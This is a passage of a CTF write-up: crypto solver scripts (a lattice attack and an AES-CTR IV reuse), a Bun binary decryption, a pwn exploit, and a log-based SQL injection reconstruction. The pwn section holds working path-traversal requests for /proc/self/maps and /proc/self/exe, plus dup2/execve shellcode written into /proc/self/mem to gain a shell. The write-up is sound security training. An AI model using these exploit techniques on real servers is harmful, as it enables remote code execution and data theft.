    # We need to use all rounds to get enough precision.
    # k=12, gap=560 bits. Total 6720 bits. e=6140 bits.
    
    # Try multiple M values because bounds are tight and probabilistic
    candidates_M = [6705, 6710, 6715, 6700, 6720]
    
    for LIMIT_BITS in candidates_M:
        print(f"Trying Lattice Reduction with LIMIT_BITS={LIMIT_BITS}...")
        M = 1 << LIMIT_BITS
        
        dim = len(fs)
        basis = []
        
        # Row 0
        row0 = [1]
        for i in range(1, dim):
            val = (fs[i] * M) // fs[0]
            row0.append(val)
        basis.append(row0)
        
        # Other rows
        for i in range(1, dim):
            row = [0] * dim
            row[i] = M
            basis.append(row)
            
        # LLL using fpylll with delta=0.99 for better reduction
        mat = IntegerMatrix.from_matrix(basis)
        LLL.reduction(mat, delta=0.99)
        
        # Check shortest vectors for potential e1
        for i in range(mat.nrows):
            row = list(mat[i])
            val = abs(row[0])
            print(f"Candidate e1: {val} (bits: {val.bit_length()})")
            if val.bit_length() > 6100 and val.bit_length() < 6200:
                rem = fs[0] % val
                print(f"  Remainder bits: {rem.bit_length()}")
                if rem.bit_length() <= 6020: # Allow small margin
                    return val
                
    return None

def main():
    try:
        sys.set_int_max_str_digits(50000)
    except: pass

    # Start process
    io = remote("challenges.1pc.tf", 28780)
    
    rounds_data = []
    
    # Collect all 12 rounds
    for i in range(1, 13):
        io.recvuntil(f"=== Round {i}/12 ===".encode())
        io.recvuntil(b"N = ")
        N = int(io.recvline().strip(), 16)
        io.recvuntil(b"a/b = ")
        val_ab = int(io.recvline().strip(), 16)
        io.recvuntil(b"f = ")
        f = int(io.recvline().strip(), 16)
        io.recvuntil(b"z = ")
        z = int(io.recvline().strip(), 16)
        io.recvuntil(b"g = ")
        g = int(io.recvline().strip(), 16)
        io.recvuntil(b"U2 = ")
        U2 = int(io.recvline().strip(), 16)
        
        rounds_data.append({
            'i': i, 'N': N, 'val_ab': val_ab, 'f': f, 'z': z, 'g': g, 'U2': U2
        })
        print(f"Collected Round {i}")

    # Step 1: Recover a, b for all rounds
    for r in rounds_data:
        r['a'], r['b'] = solve_ab(r['val_ab'], r['N'])
        if r['a'] is None:
            print(f"Failed to recover a,b for round {r['i']}")
            return

    # Step 2: Recover e1 using all 12 rounds
    fs = [r['f'] for r in rounds_data]
    e1 = solve_e_lattice(fs)
    
    if e1 is None:
        print("Failed to recover e1 from lattice")
        return
        
    print(f"Recovered e1: {e1}")
    
    # Check candidates for M1
    # f = e * M1 + c
    # M1 approx f / e
    r1 = rounds_data[0]
    M1_candidate = r1['f'] // e1
    
    print(f"Candidate M1: {M1_candidate}")
    
    # Step 3: Solve each round
    guesses = []
    
    for r in rounds_data:
        # e = f // M1
        e = r['f'] // M1_candidate
        r['e'] = e
        
        # d, p, q
        d, p, q = solve_d_factor_N(e, r['N'], r['a'], r['b'])
        
        if d is None:
            print(f"Failed to factor N for round {r['i']}")
            # Maybe e estimate was off by 1?
            # e = f // M1 might be floor.
            # But M1 is large, so e should be exact?
            # f = e*M + c. c < M. So f // M = e. Yes.
            return
            
        r['d'] = d
        r['p'] = p
        r['q'] = q
        
        phi_N = (p-1)*(q-1)
        # Use this round's modulus, not the stale N left over from the collection loop
        d_inv = inverse(d, r['N'] * phi_N)
        base = pow(r['U2'], d_inv, r['N']**2)
        
        # base = s + m2*N
        s = base % r['N']
        guesses.append(s)
        print(f"Round {r['i']} s recovered")

    # Send guesses
    for g_val in guesses:
        io.sendlineafter(b">> ", str(g_val).encode())
        res = io.recvline()
        if b"Nice" in res:
            print("Nice!")
        else:
            print("Fail!")
            print(res)
            return
            
    # Get flag
    print(io.recvall().decode())

if __name__ == "__main__":
    main()

Final Flag

C2C{3f3fe040fee1}

BigGuy

Challenge Overview

  • Category: Crypto
  • Goal: Decrypt the second part of the flag by exploiting AES-CTR key reuse.

Vulnerability Analysis

  1. AES-CTR Nonce/Counter Reuse: Counter mode transforms a block cipher into a stream cipher. If the same IV/Counter is used twice with the same key, the keystream is identical. $C_1 \oplus C_2 = P_1 \oplus P_2$.
  2. Incomplete Logic: The service checks if a provided IV is “too close” (diff <= 3 bytes) to the secret big_guy IV.
  3. Bypass: I can construct an IV that differs in exactly 3 bytes (e.g., by flipping the least-significant bit of each of the last 3 bytes) but remains numerically very close. Because the counter is a 128-bit integer incremented once per block, the counter sequence started at this IV runs into the original big_guy counter sequence after a determinable number of blocks.

Exploitation

  1. Forge IV: Retrieve big_guy. Flip the least-significant bit of bytes 13, 14, and 15 to create V.
  2. Overlap: Encrypt a long string of ‘A’s using V. Ideally, Counter(V) + offset == Counter(big_guy).
  3. Known Plaintext: The flag starts with C2C{. I scan the ciphertext for this pattern to find the exact keystream offset.
  4. Decrypt: Use the recovered keystream to decrypt FLAG2.
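
The overlap in the steps above can be reproduced offline. The following is a minimal sketch, not the challenge code: `toy_block` is a hypothetical stand-in for AES (a SHA-256 based keyed function), and the key, IV, and flag values are made up. It only illustrates that when V is numerically below big_guy, the keystream of V reaches the keystream of big_guy after `big_guy - V` blocks.

```python
import hashlib

def toy_block(key: bytes, counter: int) -> bytes:
    """Hypothetical stand-in for AES_K(counter); any keyed function shows the same effect."""
    return hashlib.sha256(key + counter.to_bytes(16, "big")).digest()[:16]

def ctr_xor(key: bytes, iv: bytes, data: bytes) -> bytes:
    """CTR mode: XOR data with the keystream of counters iv, iv+1, iv+2, ..."""
    start = int.from_bytes(iv, "big")
    out = bytearray()
    for i in range(0, len(data), 16):
        ks = toy_block(key, (start + i // 16) % (1 << 128))
        out += bytes(a ^ b for a, b in zip(data[i:i + 16], ks))
    return bytes(out)

key = b"k" * 16                                       # made-up key
big_guy = bytes(range(1, 14)) + b"\x01\x01\x01"       # made-up IV, low bits set

# Flip the least-significant bit of bytes 13, 14, 15 (three differing bytes).
v = bytearray(big_guy)
for idx in (13, 14, 15):
    v[idx] ^= 1
v = bytes(v)

# Number of blocks after which V's counter equals big_guy's counter.
offset_blocks = int.from_bytes(big_guy, "big") - int.from_bytes(v, "big")

secret = b"C2C{toy_flag}"                             # made-up plaintext
secret_ct = ctr_xor(key, big_guy, secret)
probe_ct = ctr_xor(key, v, b"A" * ((offset_blocks + 1) * 16))

# keystream = probe_ct ^ 'A'; plaintext = secret_ct ^ keystream
start = offset_blocks * 16
recovered = bytes(c ^ p ^ 0x41 for c, p in zip(secret_ct, probe_ct[start:]))
print(offset_blocks, recovered)
```

If the flipped bits happen to be 0 in big_guy, V ends up above big_guy and the sequences never meet, which is why the solver retries on a fresh connection.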

Solver Script:

from pwn import *
import ast
import json
import time

def solve():
    context.log_level = 'info'
    context.timeout = 60
    
    with open("debug.log", "w") as f:
        f.write("Starting solve script\n")
    
    while True:
        try:
            # Start the challenge process
            # p = process(['python3', 'chall.py'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            p = remote('challenges.1pc.tf', 32931)
            
            with open("debug.log", "a") as f:
                f.write(f"Started process\n")

            # Read initial output (skipping warnings)
            while True:
                try:
                    line = p.recvline().decode().strip()
                except EOFError:
                    with open("debug.log", "a") as f:
                        f.write("Got EOF immediately\n")
                    p.close()
                    line = None
                    break
                    
                with open("debug.log", "a") as f:
                    f.write(f"Got line: {line}\n")
                
                if line.startswith('spongebob'):
                    break
            
            if line is None:
                continue
                
            # Line format: spongebob [list] b'...' ok
            # Parse only the bracketed list, without evaluating arbitrary code
            list_str = line[line.find('['):line.find(']')+1]
            big_guy = ast.literal_eval(list_str)
            
            # Read encrypted flags
            flag1_line = p.recvline().decode().strip()
            with open("debug.log", "a") as f:
                f.write(f"Got flag1 line: {flag1_line}\n")
            flag2_line = p.recvline().decode().strip()
            with open("debug.log", "a") as f:
                f.write(f"Got flag2 line: {flag2_line}\n")
            
            flag1_hex = flag1_line.split('=')[1].strip().strip("'")
            flag2_hex = flag2_line.split('=')[1].strip().strip("'")
            flag1_ct = bytes.fromhex(flag1_hex)
            flag2_ct = bytes.fromhex(flag2_hex)
            
            log.info(f"Big guy: {big_guy}")
            
            # OPTIMIZED STRATEGY:
            target_indices = [13, 14, 15]
            v = list(big_guy)
            for idx in target_indices:
                v[idx] ^= 1
                
            max_blocks = 70000 
            total_len = max_blocks * 16 + len(flag1_ct)
            plaintext = 'A' * total_len
            
            req = {
                "options": "encrypt",
                "plaintext": plaintext,
                "iv": v
            }
            
            json_req = json.dumps(req)
            log.info(f"Sending payload ({len(json_req)} bytes)...")
            with open("debug.log", "a") as f:
                f.write(f"Sending payload len={len(json_req)}...\n")
                
            # Send in chunks (as bytes, which is what pwntools expects)
            json_bytes = json_req.encode()
            chunk_size = 4096
            for i in range(0, len(json_bytes), chunk_size):
                p.send(json_bytes[i:i+chunk_size])
                if i % (chunk_size * 50) == 0:
                    with open("debug.log", "a") as f:
                        f.write(f"Sent {i} bytes\n")
            p.send(b'\n') # End of line
            
            with open("debug.log", "a") as f:
                f.write("Payload sent. Waiting for response...\n")
            
            # Wait for the response line that starts with "ct_big"
            resp = ""  # defined up front so the check below is safe after an early EOF
            while True:
                try:
                    # Read line by line until the ct_big line arrives
                    line_bytes = p.recvuntil(b'\n').strip()
                    resp = line_bytes.decode(errors='ignore')
                    if resp.startswith("ct_big"):
                        break
                    if "nope" in resp:
                        log.info("Plagiarism check failed (shouldn't happen with 3 diffs)")
                        break
                except EOFError:
                    break
            
            if not resp or not resp.startswith("ct_big"):
                p.close()
                continue

            # Parse ct_big
            ct_hex_part = resp.split('=', 1)[1].strip()
            ct_big = ast.literal_eval(ct_hex_part)

            # Try to get ct_pants as well
            ct_pants = None
            try:
                # Loop to find ct_pants, expecting it within a few lines
                for _ in range(5):
                    line_bytes = p.recvuntil(b'\n', timeout=5).strip()
                    resp2 = line_bytes.decode(errors='ignore')
                    with open("debug.log", "a") as f:
                        f.write(f"Got resp2 line: {resp2[:100]}...\n")
                    if resp2.startswith("ct_pants"):
                        ct_hex_part2 = resp2.split('=', 1)[1].strip()
                        ct_pants = ast.literal_eval(ct_hex_part2)
                        break
            except Exception as e:
                with open("debug.log", "a") as f:
                    f.write(f"Failed to get ct_pants: {e}\n")
                pass
            
            # Helper function to decrypt at specific offset
            def decrypt_at_offset(ciphertext, known_ct, offset, label):
                if not ciphertext or offset + len(known_ct) > len(ciphertext):
                    return None
                
                try:
                    decrypted = bytearray()
                    for i in range(len(known_ct)):
                        decrypted.append(known_ct[i] ^ ciphertext[offset+i] ^ 0x41)
                    val = bytes(decrypted)
                    log.success(f"Decrypted {label} at offset {offset}: {val}")
                    print(f"{label}: {val}")
                    return val
                except:
                    return None

            # Scan loop
            found_flag = False
            for k in range(max_blocks):
                offset = k * 16
                if offset + 4 > len(ct_big):
                    break
                    
                try:
                    # Check FLAG1 header
                    c0 = flag1_ct[0] ^ ct_big[offset] ^ 0x41
                    c1 = flag1_ct[1] ^ ct_big[offset+1] ^ 0x41
                    c2 = flag1_ct[2] ^ ct_big[offset+2] ^ 0x41
                    c3 = flag1_ct[3] ^ ct_big[offset+3] ^ 0x41
                    
                    if bytes([c0, c1, c2, c3]) == b'C2C{':
                        log.success(f"Found FLAG1 match at block {k} (offset {offset})!")
                        
                        flag1 = decrypt_at_offset(ct_big, flag1_ct, offset, "FLAG1")
                        
                        # Use SAME offset for FLAG2
                        if ct_pants:
                           flag2 = decrypt_at_offset(ct_pants, flag2_ct, offset, "FLAG2")
                        else:
                           log.warning("ct_pants missing, cannot recover FLAG2")
                        
                        found_flag = True
                        break
                except Exception:
                    continue
            
            if found_flag:
                break
            else:
                log.info("Flag not found in this attempt (wrong direction?), retrying...")
                p.close()
                
        except Exception as e:
            with open("debug.log", "a") as f:
                f.write(f"Exception: {e}\n")
            # log.error() raises, which would skip the cleanup below; warn instead
            log.warning(f"Error: {e}")
            p.close()
            time.sleep(1)

if __name__ == "__main__":
    solve()

Final Flag

C2C{5d6d98ac-68de-4257-9e3a-59686514d0fd9a0e0ca79875}


Reverse Engineering

Bunaken

Challenge Overview

  • Category: Reverse Engineering
  • Provided Files: bunaken (Binary), flag.txt (Encrypted)
  • Goal: Reverse the binary to determine the encryption algorithm and key, then decrypt the flag.

Initial Analysis

  • File Identification:
    • file bunaken: 64-bit ELF executable.
    • strings bunaken: Contains references to Bun, JavaScriptCore, and typical JS strings.
    • Conclusion: This is a standalone Bun runtime executable. Bun apps often append the JS source to the end of the binary.

Binary Reversing / Deobfuscation

Step 1: Extraction I located the start of the bundled JavaScript payload by inspecting the end of the binary (using tail or a hex editor). The payload starts with a large array and obfuscated logic.

Step 2: Deobfuscation Analysis The script uses a string-hiding technique:

  1. String Array: A minimal array n is defined (e.g., ["WR0...", "toString", ...]).
  2. Rotation (Shuffle): An IIFE (Immediately Invoked Function Expression) rotates this array continuously until a specific checksum/condition is met (checking parseInt values). This restores the correct order of strings.
  3. Decoders:
    • l(index): Simple offset-based retrieval (index - 367).
    • c(index, key): Retrieves a base64-encoded string and applies an RC4-like XOR decryption using the provided character key.
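
The rotate-until-checksum step and the offset-based lookup can be sketched in Python. This is an illustration only: the array contents, the checksum formula, and the target value 712 are hypothetical toy values; only the `index - 367` offset comes from the analysis above.

```python
import re

def leading_int(s: str) -> int:
    """Rough analogue of JS parseInt: leading digits, or 0 if there are none."""
    m = re.match(r"\d+", s)
    return int(m.group()) if m else 0

def checksum(arr) -> int:
    # Toy checksum; the real script combines several parseInt() results.
    return leading_int(arr[0]) * 100 + leading_int(arr[1])

def rotate_until(strings, target):
    """Rotate left one element at a time until the checksum matches."""
    arr = list(strings)
    for _ in range(len(arr)):
        if checksum(arr) == target:
            return arr
        arr.append(arr.pop(0))  # same effect as arr.push(arr.shift()) in JS
    raise ValueError("no rotation satisfies the checksum")

def lookup(arr, index, base=367):
    """Offset-based retrieval, mirroring l(index) = array[index - 367]."""
    return arr[index - base]

shuffled = ["toString", "digest", "7xyz", "12abc"]   # hypothetical contents
restored = rotate_until(shuffled, target=712)
word = lookup(restored, 369)
print(restored, word)
```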

Step 3: Protocol Reconstruction By emulating the deobfuscation logic (running the extraction script in Node.js), I resolved the critical API calls:

  • s(373, "rG]G") -> sulawesi
  • s(387) -> zstdCompress
  • t(402) -> digest, r(399) -> SHA-256
  • t(375) -> AES-CBC

The Algorithm:

  1. Compression: Input data is compressed using Bun.zstdCompress.
  2. Key Derivation: key = SHA-256("sulawesi").slice(0, 16).
  3. Encryption: AES-CBC with a random 16-byte IV.
  4. Output: Concatenated IV + Ciphertext.

Flag Validation

The script writes the output to flag.txt.bunakencrypted. To recover the flag, I undo the operations in reverse order: separate the IV, decrypt AES, decompress Zstd.

Exploitation / Solver

Solver Script:

import base64
import hashlib
import zstandard as zstd
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

def solve():
    # 1. Read Encrypted File
    try:
        with open("flag.txt.bunakencrypted", "r") as f:
            b64_data = f.read().strip()
    except FileNotFoundError:
        print("[-] flag.txt.bunakencrypted not found.")
        return

    data = base64.b64decode(b64_data)
    
    # 2. Extract IV and Ciphertext
    iv = data[:16]
    ciphertext = data[16:]
    
    # 3. Derive Key
    key = hashlib.sha256(b"sulawesi").digest()[:16]
    
    # 4. Decrypt AES-CBC
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
    decryptor = cipher.decryptor()
    decrypted_padded = decryptor.update(ciphertext) + decryptor.finalize()
    
    # 5. Strip PKCS#7 padding (if present), then decompress Zstd
    pad_len = decrypted_padded[-1]
    if 1 <= pad_len <= 16 and decrypted_padded.endswith(bytes([pad_len]) * pad_len):
        compressed = decrypted_padded[:-pad_len]
    else:
        compressed = decrypted_padded
    dctx = zstd.ZstdDecompressor()
    try:
        # Padding is removed first so the decompressor sees only the Zstd frame
        flag = dctx.decompress(compressed)
        print(f"[+] Flag: {flag.decode()}")
    except Exception as e:
        print(f"[-] Decompression failed: {e}")

if __name__ == "__main__":
    solve()

Final Flag

C2C{BUN_AwKward_ENcryption_compression_obfuscation}


Pwn

NS3

Challenge Overview

  • Category: Pwn
  • Goal: Achieve Remote Code Execution (RCE) on the custom HTTP server.

Vulnerability Analysis

The C++ server src/server.cpp has two critical flaws:

  1. Path Traversal: The process_get and process_put functions use open(path.c_str(), ...) directly with user input. A path like ../../../../proc/self/maps is valid.
  2. Unsafe Memory Handling: The server runs with permissions that allow writing to /proc/self/mem (its own memory), bypassing standard W^X (Write XOR Execute) protections.

Exploitation / Solver

Methodology:

  1. ASLR Bypass: Send a GET request for /proc/self/maps. Parse the output to find the base address of the server binary segment.
  2. Binary Extraction (Optional but useful): Download /proc/self/exe to analyze offsets locally.
  3. Code Execution:
    • Ideally, I want to execute shellcode.
    • I target the Server::send_response function, which is called at the end of the process_put handler.
    • I construct a shellcode payload that reuses the existing socket (looping over FDs 3-10) and spawns /bin/sh.
    • I send a PUT request to /proc/self/mem targeting the address of send_response (Base + Offset).
    • The payload overwrites the function code. When the server tries to send the response, it executes the shellcode instead.
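
The address arithmetic behind the ASLR bypass can be sketched as follows. The maps excerpt, the path /app/server, and the 0x5a10 symbol offset are made-up illustration values, not data from the challenge. The sketch assumes the usual PIE layout, where a mapping's start address minus its file offset gives the load base.

```python
SAMPLE_MAPS = """\
55d0c1a00000-55d0c1a04000 r--p 00000000 08:01 1234 /app/server
55d0c1a04000-55d0c1a10000 r-xp 00004000 08:01 1234 /app/server
7f3a10000000-7f3a10021000 rw-p 00000000 00:00 0
"""

def image_base(maps_text: str, name: str) -> int:
    """Return the load base of the first mapping whose path ends with `name`."""
    for line in maps_text.splitlines():
        fields = line.split()
        # Fields: address range, perms, file offset, device, inode, path
        if len(fields) >= 6 and fields[5].endswith(name):
            start = int(fields[0].split("-")[0], 16)
            file_offset = int(fields[2], 16)
            return start - file_offset
    raise ValueError(f"no mapping found for {name!r}")

base = image_base(SAMPLE_MAPS, "server")
send_response_offset = 0x5A10            # hypothetical symbol offset
target = base + send_response_offset     # value passed as the PUT offset
print(hex(base), hex(target))
```

Subtracting the file offset means the same function works whether the first matching line is the r--p header segment or the r-xp text segment.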

Solver Script:


import os
import re
import time

import requests
from pwn import *

context.arch = 'amd64'
context.os = 'linux'

HOST = 'challenges.1pc.tf'
PORT = 23158
URL = f'http://{HOST}:{PORT}'

def download_binary():
    print("[*] Downloading binary...")
    r = requests.get(f'{URL}/?path=../../../../proc/self/exe', stream=True)
    with open('server_leaked', 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)
    print("[+] Binary downloaded as 'server_leaked'")

def get_base_address():
    print("[*] Leaking /proc/self/maps...")
    r = requests.get(f'{URL}/?path=../../../../proc/self/maps')
    for line in r.text.splitlines():
        if 'server' in line and 'r--p' in line: # Try to find r-xp or r--p, usually the first one is text base
             # The permissions might be r-xp or r--p depending on kernel/linker
             parts = line.split('-')
             base = int(parts[0], 16)
             print(f"[+] Leaked Base Address: {hex(base)}")
             return base
    
    # Fallback: just take the very first line
    line = r.text.splitlines()[0]
    parts = line.split('-')
    base = int(parts[0], 16)
    print(f"[+] Leaked Base Address (Fallback): {hex(base)}")
    return base

def exploit():
    # 1. Download Binary to find offsets
    if not os.path.exists('server_leaked'):
        download_binary()
    
    elf = ELF('server_leaked')
    # I need to overwrite a function that is called after I write to memory.
    # process_put calls send_response at the end:
    # void Server::process_put(...) { ... send_response(client_fd, 204, "No Content"); }
    # So if I overwrite send_response, it should trigger.
    
    # However, process_put is called inside the handle_client loop.
    # The server is multi-process (fork); modifying /proc/self/mem affects only the CURRENT process.
    # So the write and the trigger must happen on one connection (Keep-Alive is enabled).
    
    # Mangled name for Server::send_response; the fallback below searches by substring.
    target_sym = '_ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_'
    try:
        offset = elf.functions[target_sym].address
    except KeyError:
        # Try to find by demangled name or just pick one
        print("[-] Could not find symbol by name, trying to find by iterating symbols...")
        for sym, addr in elf.symbols.items():
            if 'send_response' in sym:
                offset = addr
                print(f"[+] Found symbol {sym} at {hex(offset)}")
                break
        else:
             print("[-] Failed to find send_response offset")
             return

    print(f"[+] Offset of send_response: {hex(offset)}")
    
    # 2. Leak ASLR
    # i need to do this in a new session or same?
    # Ideally i can calculate base from maps.
    base_addr = get_base_address()
    target_addr = base_addr + offset
    print(f"[+] Target Address (send_response): {hex(target_addr)}")
    
    # 3. Construct Shellcode
    # Connect back shell or reuse socket?
    # Reuse socket is best. FD is likely 4.
    # i can try to dupe 3,4,5,6 to 0,1,2
    
    shellcode = asm("""
        /* reuse socket fd */
        /* loop FDs 3 to 10 to find socket */
        xor rbx, rbx
        mov bl, 3
    loop_fds:
        cmp bl, 10
        jg exec_sh
        
        /* dup2(fd, 0) */
        mov rax, 33
        mov rdi, rbx
        xor rsi, rsi
        syscall
        
        /* dup2(fd, 1) */
        mov rax, 33
        mov rdi, rbx
        mov rsi, 1
        syscall
        
        /* dup2(fd, 2) */
        mov rax, 33
        mov rdi, rbx
        mov rsi, 2
        syscall

        inc rbx
        jmp loop_fds

    exec_sh:
        /* execve("/bin/sh") */
        mov rax, 59
        lea rdi, [rip+binsh]
        xor rsi, rsi
        xor rdx, rdx
        syscall
    
    binsh:
        .string "/bin/sh"
    """)
    
    print(f"[+] Shellcode length: {len(shellcode)}")
    
    # 4. Write Shellcode via PUT to /proc/self/mem
    # i need to seek to target_addr.
    # process_put(path, offset, content)
    # path = /proc/self/mem
    # offset = target_addr
    
    print("[*] Sending Exploit...")
    
    # Use raw socket to ensure i keep connection for the trigger?
    # Actually requests Session should handle keep-alive.
    s = requests.Session()
    
    # First, just to be sure i have a session and stick to one process
    s.get(f'{URL}/')
    
    # Now PUT the shellcode
    # URL encoded path? path parameter is in query string.
    # /?path=../../../../proc/self/mem&offset=TARGET_ADDR&method=PUT (no method param, it uses HTTP method)
    # The code checks method == "PUT".
    
    files = {'dummy': 'dummy'} # requests might force POST if data is present, need to force PUT
    # Using data=shellcode
    
    # The server uses `req.offset` from query param `offset`.
    put_url = f'{URL}/?path=../../../../proc/self/mem&offset={target_addr}'
    
    # i need to verify if the server accepts body in PUT.
    # Yes: process_put(..., req.body)
    
    r = s.put(put_url, data=shellcode)
    
    print(f"[*] Exploit sent. Status: {r.status_code}")
    
    # If the shellcode executed, it has taken over this connection:
    # process_put -> write (ok) -> close (mem fd) -> send_response (SHELLCODE),
    # and send_response is what I overwrote.
    
    # The connection `s` should now be hooked to /bin/sh, but requests will keep
    # waiting for an HTTP response, so the final interaction is done with
    # pwntools in pwn_exploit() below.
    return

def pwn_exploit():
    if not os.path.exists('server_leaked'):
        download_binary()
        
    elf = ELF('server_leaked')
    # Find send_response offset
    # _ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_
    # i can also just search for the function prelude if symbols are stripped.
    # But let's assume symbols exist since it's a CTF challenge not explicitly stripped.
    
    try:
        # direct name lookup
        offset = elf.functions['_ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_'].address
    except:
        # manual search in symbols
        for sym, addr in elf.symbols.items():
            if 'send_response' in sym:
                offset = addr
                break
        else:
            log.error("Could not find send_response symbol")
            return

    log.info(f"Offset: {hex(offset)}")
    
    # Leak Maps
    r = remote(HOST, PORT)
    r.sendline(b'GET /?path=../../../../proc/self/maps HTTP/1.1\r\nHost: localhost\r\n\r\n')
    
    maps = b""
    try:
        maps = r.recvall(timeout=2)
    except:
        pass

    if not maps:
        log.error("Failed to leak maps")
        return

    print("[*] Maps content:")
    print(maps.decode(errors='replace'))
    
    # Parse maps to find base address
    base_addr = 0
    # Look for the first line with 'server' and 'r--p' (read-only, private - usually the header/first segment)
    # If not found, look for 'r-xp' and subtract offset.
    
    lines = maps.splitlines()
    for line in lines:
        if b'server' in line and b'r--p' in line:
            parts = line.split(b'-')
            base_addr = int(parts[0], 16)
            log.info(f"Found base address from r--p segment: {hex(base_addr)}")
            break
            
    if base_addr == 0:
        # Try r-xp
        for line in lines:
            if b'server' in line and b'r-xp' in line:
                # 7a...-7a... r-xp offset ...
                parts = line.split()
                start_addr = int(parts[0].split(b'-')[0], 16)
                offset_val = int(parts[2], 16)
                base_addr = start_addr - offset_val
                log.info(f"Calculated base address from r-xp segment: {hex(base_addr)}")
                break
                
    if base_addr == 0:
        log.error("Could not determine base address")
        return

    elf.address = base_addr
    
    # Recalculate offset using pwntools ELF with base set
    try:
        target_addr = elf.functions['_ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_'].address
    except:
        # Fallback search
        for sym, addr in elf.symbols.items():
            if 'send_response' in sym:
                # With elf.address set, pwntools returns absolute addresses
                # from both ELF.functions and ELF.symbols.
                target_addr = addr  # already absolute
                break
    
    log.info(f"Base Address: {hex(base_addr)}")
    log.info(f"Target overwrite address: {hex(target_addr)}")
    
    r.close()
    
    # New connection for exploitation
    r = remote(HOST, PORT)
    
    shellcode = asm("""
        /* reuse socket fd */
        xor rbx, rbx
        mov bl, 3
    loop_fds:
        cmp bl, 10
        jg exec_sh
        
        /* dup2(fd, 0) */
        mov rax, 33
        mov rdi, rbx
        xor rsi, rsi
        syscall
        
        /* dup2(fd, 1) */
        mov rax, 33
        mov rdi, rbx
        mov rsi, 1
        syscall
        
        /* dup2(fd, 2) */
        mov rax, 33
        mov rdi, rbx
        mov rsi, 2
        syscall

        inc rbx
        jmp loop_fds

    exec_sh:
        /* execve("/bin/sh", ["/bin/sh", 0], 0) */
        mov rax, 59
        lea rdi, [rip+binsh]
        
        /* construct argv array on stack */
        xor rdx, rdx
        push rdx          /* null terminator */
        push rdi          /* pointer to "/bin/sh" */
        mov rsi, rsp      /* rsi -> argv */
        
        xor rdx, rdx      /* envp = NULL */
        syscall
    
    binsh:
        .string "/bin/sh"
    """)
    
    payload = shellcode
    content_length = len(payload)
    
    # PUT request
    req = f'PUT /?path=../../../../proc/self/mem&offset={target_addr} HTTP/1.1\r\n'
    req += f'Host: {HOST}\r\n'
    req += f'Content-Length: {content_length}\r\n'
    req += 'Connection: keep-alive\r\n'
    req += '\r\n'
    
    r.send(req.encode() + payload)
    
    # Interaction
    time.sleep(1)
    r.sendline(b'cat /flag*')
    flag = r.recvall(timeout=5)
    print(f"[+] Flag: {flag.decode(errors='replace').strip()}")
    r.close()

if __name__ == "__main__":
    pwn_exploit()

The provided solver uses pwntools and requests to automate the ASLR leak and memory overwrite.

Final Flag

C2C{lINux_Fi1e_SyS7Em_1S_qU1te_MlND_8lowlng_l5n't_lT_9f614b3b839b?}


Forensics

Log

Challenge Overview

  • Category: Forensics
  • Goal: Reconstruct a SQL injection attack from Apache logs.

Forensics Analysis

Methodology:

  1. Identification:
    • Tool: awk, sort, uniq.
    • Command: awk '{print $1}' access.log | sort | uniq -c.
    • Finding: 219.75.27.16 is the primary attacker.
  2. Vulnerability Confirmation:
    • Tool: grep.
    • Observation: Queries containing UNION, SELECT, and SLEEP(5) confirm Time-based Blind SQLi.
    • Target: wp_easy-quotes-files table.
  3. Data Extraction:
    • The attacker used boolean inference: IF(ORD(MID(..., i, 1)) != <CHAR>, SLEEP(5), 0).
    • If the response was fast (no sleep), the character matched.
    • I parsed the logs to extract the characters where the != condition was false (i.e., NO sleep).
    • Recovered: [email protected] and hash $wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW.
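
The extraction step can be sketched as below. It is a minimal illustration under stated assumptions: the sample request lines are hypothetical, the regular expression only models the `IF(ORD(MID(..., i, 1)) != <CHAR>, SLEEP(5), 0)` shape described above, and the lines passed in are assumed to be already filtered down to the probes that returned without the delay.

```python
import re
from urllib.parse import unquote_plus

# Captures the character position i and the compared character code.
PROBE = re.compile(r"ORD\(MID\(.*?,\s*(\d+)\s*,\s*1\)\)\s*!=\s*(\d+)", re.IGNORECASE)

def recover(lines):
    """Rebuild the leaked string from fast (no-sleep) != probes."""
    chars = {}
    for line in lines:
        m = PROBE.search(unquote_plus(line))
        if m:
            # If several probes hit the same position, the last one wins.
            chars[int(m.group(1))] = chr(int(m.group(2)))
    return "".join(chars[i] for i in sorted(chars))

# Hypothetical, already-filtered request lines.
sample = [
    "GET /?id=1%20AND%20IF(ORD(MID((SELECT%20user_email),1,1))!=97,SLEEP(5),0) HTTP/1.1",
    "GET /?id=1%20AND%20IF(ORD(MID((SELECT%20user_email),2,1))!=100,SLEEP(5),0) HTTP/1.1",
    "GET /index.php HTTP/1.1",
]
recovered = recover(sample)
print(recovered)
```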

Solver Script:

from pwn import *

answers = ["182.8.97.244", "219.75.27.16", "6", "Easy Quotes","CVE-2025-26943", "sqlmap/1.10.1.21", "[email protected]", "$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW", "11/01/2026 13:12:49", ""]
HOST = 'challenges.1pc.tf'
PORT = 23065

p = remote(HOST, PORT)
print(p.recvuntil(b"Your Answer: ").decode())

for answer in answers:
    try:
        p.sendline(answer.encode())
        print(p.recvuntil(b"Your Answer: ").decode())
    except EOFError:
        print(p.recvall().decode())
        break

Final Flag

C2C{7H15_15_V3rY_345Y_3f968f28ffa4}

React

Challenge Overview

  • Category: Forensics
  • Goal: Decrypt C2 traffic from a PCAP file.

Forensics Analysis

Methodology:

  1. Traffic Analysis (tshark / Wireshark):
    • Identified malicious scans and HTTP exploits from 192.168.56.104 to port 3000.
    • Exploit: CVE-2025-55182 ("React2Shell"), a remote code execution flaw in React Server Components, reached here through the Next.js app.
  2. C2 Crypto-Analysis:
    • Identified suspicious TLS traffic on port 4433.
    • Extracted the Server Certificate.
    • Weakness: The RSA key was weak (factorizable). I factored the modulus to recover the private key.
    • Decrypted the TLS stream using the private key.
  3. Malware Deobfuscation:
    • Extracted the downloaded python agent a.py.
